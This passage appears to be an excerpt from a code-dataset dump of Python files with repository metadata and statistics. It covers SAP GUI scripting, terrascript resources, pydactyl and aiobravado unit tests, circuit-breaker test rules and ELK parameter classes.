session.findById("wnd[0]/usr/cntlGRID1/shellcont/shell/shellcont[1]/shell").setCurrentCell -1,""
session.findById("wnd[0]/usr/cntlGRID1/shellcont/shell/shellcont[1]/shell").selectAll
session.findById("wnd[0]/tbar[1]/btn[13]").press
session.findById("wnd[0]/usr/tblSAPLKOBSTC_RULES/ctxtDKOBR-EMPGE[1,0]").text = "601201-0"
session.findById("wnd[0]/usr/tblSAPLKOBSTC_RULES/ctxtCOBRB-URZUO[7,0]").text = "4"
session.findById("wnd[0]/usr/tblSAPLKOBSTC_RULES/txtCOBRB-AQZIF[4,0]").setFocus
session.findById("wnd[0]/usr/tblSAPLKOBSTC_RULES/txtCOBRB-AQZIF[4,0]").caretPosition = 0
session.findById("wnd[0]").sendVKey 3
session.findById("wnd[0]/tbar[0]/btn[11]").press
session.findById("wnd[0]/tbar[0]/btn[3]").press
session.findById("wnd[1]/usr/btnSPOP-OPTION1").press
session.findById("wnd[0]/tbar[0]/btn[3]").press
''')
# Fechar o arquivo de script
arquivo.close()
| 50.659574 | 111 | 0.746325 | 375 | 2,381 | 4.698667 | 0.322667 | 0.229852 | 0.275823 | 0.248014 | 0.641884 | 0.577753 | 0.503405 | 0.340522 | 0.340522 | 0.340522 | 0 | 0.052276 | 0.068039 | 2,381 | 46 | 112 | 51.76087 | 0.741776 | 0.150777 | 0 | 0.058824 | 0 | 0.323529 | 0.910129 | 0.831182 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.029412 | 0 | 0.029412 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2e53327fbf97bdf472b8d359d31b74e90f338b78 | 96 | py | Python | venv/lib/python3.8/site-packages/poetry/core/version/requirements.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/poetry/core/version/requirements.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/poetry/core/version/requirements.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/d2/11/dd/e3884139b17b0a08a7b9a047150bd735a59c2e947b2451d690b1dd9f43 | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.447917 | 0 | 96 | 1 | 96 | 96 | 0.447917 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2e56bd51ebd3408db2e560a6e4739824d955551e | 495 | py | Python | terrascript/triton/r.py | vutsalsinghal/python-terrascript | 3b9fb5ad77453d330fb0cd03524154a342c5d5dc | [
"BSD-2-Clause"
] | null | null | null | terrascript/triton/r.py | vutsalsinghal/python-terrascript | 3b9fb5ad77453d330fb0cd03524154a342c5d5dc | [
"BSD-2-Clause"
] | null | null | null | terrascript/triton/r.py | vutsalsinghal/python-terrascript | 3b9fb5ad77453d330fb0cd03524154a342c5d5dc | [
"BSD-2-Clause"
] | null | null | null | # terrascript/triton/r.py
import terrascript
class triton_fabric(terrascript.Resource):
pass
class triton_firewall_rule(terrascript.Resource):
pass
class triton_instance_template(terrascript.Resource):
pass
class triton_key(terrascript.Resource):
pass
class triton_machine(terrascript.Resource):
pass
class triton_service_group(terrascript.Resource):
pass
class triton_snapshot(terrascript.Resource):
pass
class triton_vlan(terrascript.Resource):
pass
| 17.068966 | 53 | 0.783838 | 57 | 495 | 6.614035 | 0.333333 | 0.233422 | 0.488064 | 0.519894 | 0.6313 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.143434 | 495 | 28 | 54 | 17.678571 | 0.889151 | 0.046465 | 0 | 0.470588 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.470588 | 0.058824 | 0 | 0.529412 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
2e716ff5a715c9fdbc64b7e22f805d208d3e274d | 40 | py | Python | dliplib/utils/__init__.py | oterobaguer/ct-dip-benchmark | 0539c284c94089ed86421ea0892cd68aa1d0575a | [
"Apache-2.0"
] | null | null | null | dliplib/utils/__init__.py | oterobaguer/ct-dip-benchmark | 0539c284c94089ed86421ea0892cd68aa1d0575a | [
"Apache-2.0"
] | null | null | null | dliplib/utils/__init__.py | oterobaguer/ct-dip-benchmark | 0539c284c94089ed86421ea0892cd68aa1d0575a | [
"Apache-2.0"
] | null | null | null | from dliplib.utils.params import Params
| 20 | 39 | 0.85 | 6 | 40 | 5.666667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 40 | 1 | 40 | 40 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2e8074ebb56b9a2484ee303e95d1563da249c5e6 | 24 | py | Python | dask-gateway-server/dask_gateway_server/proxy/__init__.py | AndreaGiardini/dask-gateway | c2583548df19359d24031e1dd9161c616d3bed50 | [
"BSD-3-Clause"
] | 69 | 2019-09-19T06:19:48.000Z | 2022-02-04T23:01:15.000Z | dask-gateway-server/dask_gateway_server/proxy/__init__.py | AndreaGiardini/dask-gateway | c2583548df19359d24031e1dd9161c616d3bed50 | [
"BSD-3-Clause"
] | 318 | 2019-09-18T18:42:57.000Z | 2022-03-31T11:05:38.000Z | dask-gateway-server/dask_gateway_server/proxy/__init__.py | AndreaGiardini/dask-gateway | c2583548df19359d24031e1dd9161c616d3bed50 | [
"BSD-3-Clause"
] | 61 | 2019-09-18T18:09:56.000Z | 2022-03-25T20:35:11.000Z | from .core import Proxy
| 12 | 23 | 0.791667 | 4 | 24 | 4.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 24 | 1 | 24 | 24 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2e91f726ea14b6aa0e88fa8cc530ae1b9074db18 | 295 | py | Python | scripts/helper/__init__.py | lovaulonze/nice_pub_figure | 311c04f6bc97f5a22c3bdf75ef1d192dfa8475a7 | [
"MIT"
] | null | null | null | scripts/helper/__init__.py | lovaulonze/nice_pub_figure | 311c04f6bc97f5a22c3bdf75ef1d192dfa8475a7 | [
"MIT"
] | null | null | null | scripts/helper/__init__.py | lovaulonze/nice_pub_figure | 311c04f6bc97f5a22c3bdf75ef1d192dfa8475a7 | [
"MIT"
] | null | null | null | from . import mpl_helper # Load mpl setting as well
from .mpl_helper import gridplots, grid_labels
from .mpl_helper import savepgf, add_img_ax
from .path_helper import root_path, script_path
from .path_helper import img_path, tex_path, build_path
from .tex_helper import clean_width_cache
| 42.142857 | 57 | 0.820339 | 49 | 295 | 4.612245 | 0.469388 | 0.265487 | 0.115044 | 0.168142 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138983 | 295 | 6 | 58 | 49.166667 | 0.889764 | 0.081356 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cf31e82b8625c47027d51f603032bd7c49c9ad5c | 487 | py | Python | gnn_agglomeration/pyg_datasets/__init__.py | bentaculum/gnn_agglomeration | e5b8a693ba78433b8a3721ac3102630c2a79a1e4 | [
"MIT"
] | 2 | 2021-05-19T01:56:52.000Z | 2021-07-08T20:50:38.000Z | gnn_agglomeration/pyg_datasets/__init__.py | benjamin9555/gnn_agglomeration | e5b8a693ba78433b8a3721ac3102630c2a79a1e4 | [
"MIT"
] | 14 | 2019-07-17T19:23:09.000Z | 2021-02-02T22:01:49.000Z | gnn_agglomeration/pyg_datasets/__init__.py | benjamin9555/gnn_agglomeration | e5b8a693ba78433b8a3721ac3102630c2a79a1e4 | [
"MIT"
] | 2 | 2019-07-17T20:14:03.000Z | 2019-07-27T16:20:52.000Z | from .hemibrain_dataset_blockwise import HemibrainDatasetBlockwise # noqa
from .hemibrain_dataset_blockwise_in_memory import HemibrainDatasetBlockwiseInMemory # noqa
from .hemibrain_dataset_random import HemibrainDatasetRandom # noqa
from .hemibrain_dataset_random_in_memory import HemibrainDatasetRandomInMemory # noqa
from .hemibrain_graph_unmasked import HemibrainGraphUnmasked # noqa
from .hemibrain_graph_masked import HemibrainGraphMasked # noqa
from . import toy_datasets
| 48.7 | 92 | 0.874743 | 50 | 487 | 8.18 | 0.4 | 0.190709 | 0.207824 | 0.176039 | 0.146699 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098563 | 487 | 9 | 93 | 54.111111 | 0.931663 | 0.059548 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cf3e220ab7b8edf0ba28250a48d14c4835a3e650 | 1,385 | py | Python | app/improving_agent/models/__init__.py | brettasmi/EvidARA | 319bbe80ddb4d7d6aa4f1db005ad5461e015a8bc | [
"MIT"
] | null | null | null | app/improving_agent/models/__init__.py | brettasmi/EvidARA | 319bbe80ddb4d7d6aa4f1db005ad5461e015a8bc | [
"MIT"
] | 5 | 2020-06-25T21:47:50.000Z | 2020-07-15T01:22:51.000Z | app/improving_agent/models/__init__.py | suihuanglab/evidARA | cf5b8bbdb9f90136c66b58c694acf2efc18ffc22 | [
"MIT"
] | 1 | 2020-03-23T10:39:59.000Z | 2020-03-23T10:39:59.000Z | # coding: utf-8
# flake8: noqa
from __future__ import absolute_import
# import models into model package
from improving_agent.models.async_query import AsyncQuery
from improving_agent.models.attribute import Attribute
from improving_agent.models.edge import Edge
from improving_agent.models.edge_binding import EdgeBinding
from improving_agent.models.knowledge_graph import KnowledgeGraph
from improving_agent.models.log_entry import LogEntry
from improving_agent.models.log_level import LogLevel
from improving_agent.models.message import Message
from improving_agent.models.meta_attribute import MetaAttribute
from improving_agent.models.meta_edge import MetaEdge
from improving_agent.models.meta_knowledge_graph import MetaKnowledgeGraph
from improving_agent.models.meta_node import MetaNode
from improving_agent.models.node import Node
from improving_agent.models.node_binding import NodeBinding
from improving_agent.models.q_edge import QEdge
from improving_agent.models.q_node import QNode
from improving_agent.models.query import Query
from improving_agent.models.query_constraint import QueryConstraint
from improving_agent.models.query_graph import QueryGraph
from improving_agent.models.response import Response
from improving_agent.models.result import Result
from improving_agent.models.schema2 import Schema2
from improving_agent.models.sub_attribute import SubAttribute
| 47.758621 | 74 | 0.883755 | 192 | 1,385 | 6.145833 | 0.255208 | 0.25339 | 0.350847 | 0.467797 | 0.351695 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003135 | 0.0787 | 1,385 | 28 | 75 | 49.464286 | 0.92163 | 0.042599 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cf795254af783d664b11ec5ae045c27293b9b117 | 3,875 | py | Python | tests/client/schedules_test.py | jozefbonnar/pydactyl | b45ce82ac0e20c786ffd3a65bab959c9bb3226ba | [
"MIT"
] | null | null | null | tests/client/schedules_test.py | jozefbonnar/pydactyl | b45ce82ac0e20c786ffd3a65bab959c9bb3226ba | [
"MIT"
] | null | null | null | tests/client/schedules_test.py | jozefbonnar/pydactyl | b45ce82ac0e20c786ffd3a65bab959c9bb3226ba | [
"MIT"
] | null | null | null | import unittest
from unittest import mock
from pydactyl import PterodactylClient
class SchedulesTests(unittest.TestCase):
def setUp(self):
self.api = PterodactylClient(url='dummy', api_key='dummy')
@mock.patch('pydactyl.api.base.PterodactylAPI._api_request')
def test_list_schedules(self, mock_api):
expected = {
'endpoint': 'client/servers/srv123/schedules',
}
self.api.client.servers.schedules.list_schedules('srv123')
mock_api.assert_called_with(**expected)
@mock.patch('pydactyl.api.base.PterodactylAPI._api_request')
def test_create_schedule(self, mock_api):
expected = {
'endpoint': 'client/servers/srv123/schedules',
'mode': 'POST',
'data': {'name': 'test', 'minute': '*', 'hour': '1',
'day_of_week': 'pants', 'day_of_month': 'doggo',
'is_active': True},
}
self.api.client.servers.schedules.create_schedule(
'srv123', 'test', '*', '1', 'pants', 'doggo')
mock_api.assert_called_with(**expected)
@mock.patch('pydactyl.api.base.PterodactylAPI._api_request')
def test_get_schedule_details(self, mock_api):
expected = {
'endpoint': 'client/servers/srv123/schedules/3',
}
self.api.client.servers.schedules.get_schedule_details('srv123', 3)
mock_api.assert_called_with(**expected)
@mock.patch('pydactyl.api.base.PterodactylAPI._api_request')
def test_update_schedule(self, mock_api):
expected = {
'endpoint': 'client/servers/srv123/schedules/4',
'mode': 'POST',
'data': {'name': 'test', 'minute': '*', 'hour': '1',
'day_of_week': 'pants', 'day_of_month': 'doggo',
'is_active': True},
}
self.api.client.servers.schedules.update_schedule(
'srv123', 4, 'test', '*', '1', 'pants', 'doggo')
mock_api.assert_called_with(**expected)
@mock.patch('pydactyl.api.base.PterodactylAPI._api_request')
def test_delete_schedule(self, mock_api):
expected = {
'endpoint': 'client/servers/srv123/schedules/5',
'mode': 'DELETE',
}
self.api.client.servers.schedules.delete_schedule('srv123', 5)
mock_api.assert_called_with(**expected)
@mock.patch('pydactyl.api.base.PterodactylAPI._api_request')
def test_create_task(self, mock_api):
expected = {
'endpoint': 'client/servers/srv123/schedules/5/tasks',
'mode': 'POST',
'data': {'action': 'command', 'payload': 'say Hello World',
'time_offset': '6'}
}
self.api.client.servers.schedules.create_task('srv123', 5, 'command',
'say Hello World', '6')
mock_api.assert_called_with(**expected)
@mock.patch('pydactyl.api.base.PterodactylAPI._api_request')
def test_update_task(self, mock_api):
expected = {
'endpoint': 'client/servers/srv123/schedules/5/tasks/4',
'mode': 'POST',
'data': {'action': 'command', 'payload': 'say Hello World',
'time_offset': '6'}
}
self.api.client.servers.schedules.update_task('srv123', 5, 4, 'command',
'say Hello World', '6')
mock_api.assert_called_with(**expected)
@mock.patch('pydactyl.api.base.PterodactylAPI._api_request')
def test_delete_task(self, mock_api):
expected = {
'endpoint': 'client/servers/srv123/schedules/5/tasks/4',
'mode': 'DELETE',
}
self.api.client.servers.schedules.delete_task('srv123', 5, 4)
mock_api.assert_called_with(**expected)
if __name__ == '__main__':
unittest.main()
| 39.141414 | 80 | 0.586065 | 415 | 3,875 | 5.243373 | 0.166265 | 0.051471 | 0.0625 | 0.073529 | 0.84421 | 0.817555 | 0.792279 | 0.792279 | 0.752757 | 0.702206 | 0 | 0.025299 | 0.265548 | 3,875 | 98 | 81 | 39.540816 | 0.739283 | 0 | 0 | 0.547619 | 0 | 0 | 0.293161 | 0.165677 | 0 | 0 | 0 | 0 | 0.095238 | 1 | 0.107143 | false | 0 | 0.035714 | 0 | 0.154762 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
cf7c22dd318039cc4f2e3a5eff77c87bfeaf63d3 | 141 | py | Python | modular_sphere/__init__.py | mcaniot/modular_sphere | dcced596fa79f924b361c5f8384e612778e9b360 | [
"Apache-2.0"
] | 1 | 2021-03-24T14:56:58.000Z | 2021-03-24T14:56:58.000Z | modular_sphere/__init__.py | mcaniot/modular_sphere | dcced596fa79f924b361c5f8384e612778e9b360 | [
"Apache-2.0"
] | null | null | null | modular_sphere/__init__.py | mcaniot/modular_sphere | dcced596fa79f924b361c5f8384e612778e9b360 | [
"Apache-2.0"
] | null | null | null | from modular_sphere.robot_sphere import RobotSphere
from modular_sphere.simulation_manager import SimulationManager
name = 'modular_sphere'
| 28.2 | 63 | 0.879433 | 17 | 141 | 7 | 0.588235 | 0.327731 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 141 | 4 | 64 | 35.25 | 0.922481 | 0 | 0 | 0 | 0 | 0 | 0.099291 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d8488dc29ae80241bee30ee1357375ddb9d76078 | 3,888 | py | Python | tests/http_future/unmarshall_response_test.py | sjaensch/aiobravado | d3f1eb71883b1f24c4b592917890160eb3d3cbcc | [
"BSD-3-Clause"
] | 19 | 2017-11-20T22:47:12.000Z | 2021-12-23T15:56:41.000Z | tests/http_future/unmarshall_response_test.py | sjaensch/aiobravado | d3f1eb71883b1f24c4b592917890160eb3d3cbcc | [
"BSD-3-Clause"
] | 10 | 2018-01-11T12:53:01.000Z | 2020-01-27T20:05:51.000Z | tests/http_future/unmarshall_response_test.py | sjaensch/aiobravado | d3f1eb71883b1f24c4b592917890160eb3d3cbcc | [
"BSD-3-Clause"
] | 4 | 2017-11-18T12:37:14.000Z | 2021-03-19T14:48:13.000Z | # -*- coding: utf-8 -*-
from functools import partial
import pytest
from bravado_core.exception import MatchingResponseNotFound
from bravado_core.operation import Operation
from bravado_core.response import IncomingResponse
from mock import Mock
from mock import patch
from aiobravado.exception import HTTPError
from aiobravado.http_future import unmarshal_response
def unmarshal_response_inner_factory(result):
async def mock_umi(*args, **kwargs):
return result
return mock_umi
def test_5XX(event_loop):
incoming_response = Mock(spec=IncomingResponse, status_code=500)
operation = Mock(spec=Operation)
with pytest.raises(HTTPError) as excinfo:
event_loop.run_until_complete(unmarshal_response(incoming_response, operation))
assert excinfo.value.response.status_code == 500
@patch('aiobravado.http_future.unmarshal_response_inner', new_callable=partial(unmarshal_response_inner_factory, 99))
def test_2XX(_1, event_loop):
incoming_response = Mock(spec=IncomingResponse)
incoming_response.status_code = 200
operation = Mock(spec=Operation)
event_loop.run_until_complete(unmarshal_response(incoming_response, operation))
assert incoming_response.swagger_result == 99
@patch('aiobravado.http_future.unmarshal_response_inner',
side_effect=MatchingResponseNotFound('boo'))
def test_2XX_matching_response_not_found_in_spec(_1, event_loop):
incoming_response = Mock(spec=IncomingResponse, status_code=200)
operation = Mock(spec=Operation)
with pytest.raises(HTTPError) as excinfo:
event_loop.run_until_complete(unmarshal_response(incoming_response, operation))
assert excinfo.value.response.status_code == 200
assert excinfo.value.message == 'boo'
@patch('aiobravado.http_future.unmarshal_response_inner',
side_effect=MatchingResponseNotFound)
def test_4XX_matching_response_not_found_in_spec(_1, event_loop):
incoming_response = Mock(spec=IncomingResponse, status_code=404)
operation = Mock(spec=Operation)
with pytest.raises(HTTPError) as excinfo:
event_loop.run_until_complete(unmarshal_response(incoming_response, operation))
assert excinfo.value.response.status_code == 404
@patch(
'aiobravado.http_future.unmarshal_response_inner',
new_callable=partial(unmarshal_response_inner_factory, {'msg': 'Not found'})
)
def test_4XX(_1, event_loop):
incoming_response = Mock(spec=IncomingResponse, status_code=404)
operation = Mock(spec=Operation)
with pytest.raises(HTTPError) as excinfo:
event_loop.run_until_complete(unmarshal_response(incoming_response, operation))
assert excinfo.value.response.status_code == 404
assert excinfo.value.swagger_result == {'msg': 'Not found'}
@patch('aiobravado.http_future.unmarshal_response_inner', new_callable=partial(unmarshal_response_inner_factory, 99))
def test_response_callbacks_executed_on_happy_path(_1, event_loop):
incoming_response = Mock(spec=IncomingResponse)
incoming_response.status_code = 200
operation = Mock(spec=Operation)
callback = Mock()
event_loop.run_until_complete(
unmarshal_response(incoming_response, operation, response_callbacks=[callback])
)
assert incoming_response.swagger_result == 99
assert callback.call_count == 1
@patch('aiobravado.http_future.unmarshal_response_inner', new_callable=partial(unmarshal_response_inner_factory, 99))
def test_response_callbacks_executed_on_failure(_1, event_loop):
incoming_response = Mock(spec=IncomingResponse, status_code=404)
operation = Mock(spec=Operation)
callback = Mock()
with pytest.raises(HTTPError) as excinfo:
event_loop.run_until_complete(
unmarshal_response(incoming_response, operation, response_callbacks=[callback])
)
assert excinfo.value.response.status_code == 404
assert callback.call_count == 1
| 40.5 | 117 | 0.785494 | 477 | 3,888 | 6.083857 | 0.159329 | 0.111303 | 0.083391 | 0.060303 | 0.813232 | 0.798759 | 0.769125 | 0.768091 | 0.752584 | 0.732254 | 0 | 0.017741 | 0.130144 | 3,888 | 95 | 118 | 40.926316 | 0.840331 | 0.005401 | 0 | 0.552632 | 0 | 0 | 0.080724 | 0.072962 | 0 | 0 | 0 | 0 | 0.144737 | 1 | 0.105263 | false | 0 | 0.118421 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d8bd96fc0109a56ed7c9c977bd1aaab9a48a08e8 | 1,076 | py | Python | tests/fake/fallbacks/circuit_breaker/rules.py | rafaelgotts/django-toolkit | 10b68cbb326bdbc8c2d9efda5edbfc7768476a72 | [
"MIT"
] | 14 | 2016-07-25T19:29:05.000Z | 2021-12-10T19:12:37.000Z | tests/fake/fallbacks/circuit_breaker/rules.py | rafaelgotts/django-toolkit | 10b68cbb326bdbc8c2d9efda5edbfc7768476a72 | [
"MIT"
] | 37 | 2016-07-22T12:28:02.000Z | 2021-03-19T21:52:39.000Z | tests/fake/fallbacks/circuit_breaker/rules.py | rafaelgotts/django-toolkit | 10b68cbb326bdbc8c2d9efda5edbfc7768476a72 | [
"MIT"
] | 8 | 2016-10-05T13:02:32.000Z | 2020-08-02T12:59:08.000Z | # -*- coding: utf-8 -*-
from django_toolkit.fallbacks.circuit_breaker.rules import Rule
class FakeRuleShouldOpen(Rule):
def should_open_circuit(self, total_failures, total_requests):
return True
def log_increase_failures(self, total_failures, total_requests):
pass
class FakeRuleShouldNotOpen(Rule):
def should_open_circuit(self, total_failures, total_requests):
return False
def log_increase_failures(self, total_failures, total_requests):
pass
class FakeRuleShouldNotIncreaseFailure(Rule):
def should_increase_failure_count(self):
return False
def should_open_circuit(self, total_failures, total_requests):
return False
def log_increase_failures(self, total_failures, total_requests):
pass
class FakeRuleShouldNotIncreaseRequest(Rule):
def should_increase_request_count(self):
return False
def should_open_circuit(self, total_failures, total_requests):
return False
def log_increase_failures(self, total_failures, total_requests):
pass
| 23.911111 | 68 | 0.742565 | 124 | 1,076 | 6.120968 | 0.266129 | 0.094862 | 0.179183 | 0.231884 | 0.693017 | 0.693017 | 0.693017 | 0.693017 | 0.693017 | 0.693017 | 0 | 0.001151 | 0.192379 | 1,076 | 44 | 69 | 24.454545 | 0.872267 | 0.019517 | 0 | 0.68 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0.16 | 0.04 | 0.24 | 0.84 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 6 |
2b4a70b0fbf208abe80c129e59068241a5c0dbb7 | 2,289 | py | Python | pymatflow/elk/base/math.py | DeqiTang/pymatflow | bd8776feb40ecef0e6704ee898d9f42ded3b0186 | [
"MIT"
] | 6 | 2020-03-06T16:13:08.000Z | 2022-03-09T07:53:34.000Z | pymatflow/elk/base/math.py | DeqiTang/pymatflow | bd8776feb40ecef0e6704ee898d9f42ded3b0186 | [
"MIT"
] | 1 | 2021-10-02T02:23:08.000Z | 2021-11-08T13:29:37.000Z | pymatflow/elk/base/math.py | DeqiTang/pymatflow | bd8776feb40ecef0e6704ee898d9f42ded3b0186 | [
"MIT"
] | 1 | 2021-07-10T16:28:14.000Z | 2021-07-10T16:28:14.000Z |
class rootsolver:
"""
"""
def __init__(self):
self.params = {}
def to_string(self):
out = ""
for item in self.params:
if self.params[item] == None:
continue
out += "%s = %s\n" % (item, self.params[item])
out += "\n"
return out
def set_params(self, params):
"""
"""
for item in params:
if len(item.split("/")) == 3:
self.params[item.split("/")[-1]] = params[item]
continue
class sparskit:
"""
"""
def __init__(self):
self.params = {}
def to_string(self):
out = ""
for item in self.params:
if self.params[item] == None:
continue
out += "%s = %s\n" % (item, self.params[item])
out += "\n"
return out
def set_params(self, params):
"""
"""
for item in params:
if len(item.split("/")) == 3:
self.params[item.split("/")[-1]] = params[item]
continue
class math:
"""
"""
def __init__(self):
self.params = {}
self.rootsolver = rootsolver()
self.sparskit = sparskit()
def to_string(self):
out = ""
for item in self.params:
if self.params[item] == None:
continue
out += "%s = %s\n" % (item, self.params[item])
out += "\n"
out += self.rootsolver.to_string()
out += self.sparskit.to_string()
return out
def set_params(self, params):
"""
"""
for item in params:
if len(item.split("/")) == 2:
self.params[item.split("/")[-1]] = params[item]
continue
if item.split("/")[1] == "RootSolver":
self.rootsolver.set_params({item: params[item]})
elif item.split("/")[1] == "SPARSKIT":
self.sparskit.set_params({item: params[item]})
else:
pass
| 27.578313 | 65 | 0.399301 | 213 | 2,289 | 4.187793 | 0.13615 | 0.201794 | 0.141256 | 0.050448 | 0.778027 | 0.702915 | 0.702915 | 0.702915 | 0.660314 | 0.660314 | 0 | 0.006483 | 0.4609 | 2,289 | 83 | 66 | 27.578313 | 0.71637 | 0 | 0 | 0.758621 | 0 | 0 | 0.027713 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.155172 | false | 0.017241 | 0 | 0 | 0.258621 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
995f24d84ef6642c4bd25a93d39921feb91b1bcd | 84 | py | Python | exercises/rail-fence-cipher/rail_fence_cipher.py | kishankj/python | 82042de746128127502e109111e6c4e8ab002af6 | [
"MIT"
] | 1,177 | 2017-06-21T20:24:06.000Z | 2022-03-29T02:30:55.000Z | exercises/rail-fence-cipher/rail_fence_cipher.py | kishankj/python | 82042de746128127502e109111e6c4e8ab002af6 | [
"MIT"
